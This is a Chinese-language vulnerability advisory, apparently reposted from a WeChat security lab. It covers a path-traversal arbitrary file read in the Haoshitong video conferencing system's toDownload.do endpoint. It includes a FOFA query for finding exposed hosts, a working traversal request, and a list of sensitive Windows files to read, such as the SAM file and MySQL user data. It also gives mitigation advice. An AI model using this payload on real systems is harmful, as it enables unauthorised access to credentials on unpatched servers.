漏洞名称
好视通视频会议系统 toDownload.do接口 任意文件读取漏洞
漏洞评分
7.5(高危)
CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
漏洞详情
好视通 是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName=存在任意文件遍历漏洞,可通过fileName参数读取任意文件。
影响产品
好视通视频会议系统
漏洞复现
1.pofa查询语法:"FOFA语法: app=“好视通-视频会议”
2.系统登录页面:
3.漏洞接口
GET /register/toDownload.do?fileName=../../../../../../../../Windows/system.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
4.winwods常见敏感路径
C:Windowssystem.ini
C:windowssystem32driversetchosts
C:boot.ini //查看系统版本
C:WindowsSystem32inetsrvMetaBase.xml //IIS配置文件
C:Windowsrepairsam //存储系统初次安装的密码
C:Program Filesmysqlmy.ini //Mysql配置
C:Program Filesmysqldatamysqluser.MYD //Mysql root
C:Windowsphp.ini //php配置信息
C:Windowsmy.ini //Mysql配置信息
修复建议
补丁名称:
好视通视频会议系统 toDownload.do接口 任意文件读取漏洞— 目前厂商暂未发布修复措施解决此安全问题,建议随时关注厂商主页或联系厂商以获取解决办法
补丁链接:
http://www.fsmeeting.com/
其他修复方法
厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:
http://www.fsmeeting.com/
缓解方案
在不影响业务的前提下,限制对受影响系统的网络访问。使用防火墙或其他网络隔离方法来限制对应用的访问,仅允许可信网络或用户访问该服务。
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】好视通视频会议系统任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论